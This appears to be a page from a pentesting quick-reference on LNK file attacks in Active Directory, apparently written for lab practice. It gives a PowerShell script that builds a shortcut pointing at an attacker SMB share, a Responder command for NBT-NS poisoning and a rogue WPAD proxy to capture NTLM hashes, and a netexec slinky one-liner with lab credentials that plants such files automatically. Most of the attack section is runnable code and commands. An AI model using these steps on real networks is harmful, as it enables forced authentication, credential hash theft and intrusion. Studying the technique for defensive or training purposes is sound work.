> For the complete documentation index, see [llms.txt](https://notes.cavementech.com/pentesting-quick-reference/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.cavementech.com/pentesting-quick-reference/active-directory/post-compromise/lnk-file-attacks.md).

# LNK File Attacks

### Manual way

#### Step 1 - create a malicious LNK file

#### Create a file linking to our Kali Running responder

<figure><img src="/files/1ETEuYSm0eAnXut2yK5W" alt=""><figcaption></figcaption></figure>

```
$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\192.168.145.141\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()
```

Put the shortcut in shared folder.

<figure><img src="/files/yXhH8ORAZLonPkZmssSL" alt=""><figcaption></figcaption></figure>

#### Step 2 - run the responder

```
sudo responder -I eth0 -v -dP 
```

* `sudo`: Runs Responder with root privileges (required).
* `responder`: The main script to run the Responder tool.
* `-I eth0`: Specifies the network interface to listen on (e.g., `eth0`).
* `-v`: Enables verbose output.
* `-d`: Enables **NBT-NS (NetBIOS Name Service) poisoning**.
* `-P`: Enables **WPAD (Web Proxy Auto-Discovery Protocol) rogue proxy**.

<figure><img src="/files/05RZ7BK7BcwDEqPyQ7iM" alt=""><figcaption><p>Make sure SMB is on</p></figcaption></figure>

#### Step 3 Exploit

Run the shortcut file and we will have a hash.

<figure><img src="/files/eHFqQb3Pe4GTwtyBr1mz" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/6heqqu3bMoI2hAzp0imr" alt=""><figcaption><p>We can crack it as well</p></figcaption></figure>

### Automated Way

Netexec can do it automatically. (slinky module)

```
netexec smb 192.168.138.137 -d marvel.local -u fcastle -p Password1 -M slinky -o NAME=test SERVER=192.168.138.149
```

It autocreates a LNK file.&#x20;

{% embed url="<https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication#execution-via-.rtf>" %}
